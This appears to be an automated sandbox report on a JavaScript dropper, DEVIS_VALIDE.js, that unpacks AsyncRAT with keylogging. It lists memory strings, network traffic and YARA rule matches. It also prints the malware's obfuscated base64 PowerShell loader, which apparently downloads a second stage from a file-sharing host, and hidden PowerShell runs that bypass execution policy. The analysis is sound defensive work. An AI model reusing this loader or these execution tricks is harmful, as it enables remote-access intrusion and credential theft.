Source: powershell.exe, 0000002C.00000002.3141181707.000001559E13A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/GF0ptUGb)
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: powershell.exe, 00000004.00000002.1992997309.00000177D9144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000004.00000002.1992997309.00000177D9144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.235.43.128:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49780 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window created: window name: CLIPBRDWNDCLASS

Source: powershell.exe

Process created: 58

System Summary

Malicious sample detected (through community Yara rule)

Source: 53.2.powershell.exe.1d3333e0230.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 44.2.powershell.exe.1558669f3b8.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 36.2.powershell.exe.1de3d91f608.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.powershell.exe.1e6806fed08.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 20.2.powershell.exe.20ece618be0.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 44.2.powershell.exe.1558669b658.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.powershell.exe.1e6806fafa8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 20.2.powershell.exe.20ece614e80.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 36.2.powershell.exe.1de3d91b8a8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 53.2.powershell.exe.1d3333dc4d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000020.00000002.2087880132.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000002C.00000002.2333261639.0000015586871000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000035.00000002.2425933120.000001D3332B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000014.00000002.2013251264.0000020ECE7E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000035.00000002.2425933120.000001D3335B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000002C.00000002.2333261639.000001558655B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000014.00000002.2013251264.0000020ECE53D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001C.00000002.2070695014.000001E6808CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000024.00000002.2195585060.000001DE3D7DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000024.00000002.2195585060.000001DE3DAEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001C.00000002.2070695014.000001E6805BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2568, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1820, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8700, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8224, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 +
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 +	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B7030E9	5_2_00007FFD9B7030E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9B7330E9	6_2_00007FFD9B7330E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 28_2_00007FFD9B650FF2	28_2_00007FFD9B650FF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 40_2_01321418	40_2_01321418
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 56_2_015113F8	56_2_015113F8

Source: DEVIS_VALIDE.js

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 15447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2677
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 15447	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2677	Jump to behavior

Source: 53.2.powershell.exe.1d3333e0230.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 44.2.powershell.exe.1558669f3b8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 36.2.powershell.exe.1de3d91f608.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.powershell.exe.1e6806fed08.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 20.2.powershell.exe.20ece618be0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 44.2.powershell.exe.1558669b658.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 28.2.powershell.exe.1e6806fafa8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 20.2.powershell.exe.20ece614e80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 36.2.powershell.exe.1de3d91b8a8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 53.2.powershell.exe.1d3333dc4d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
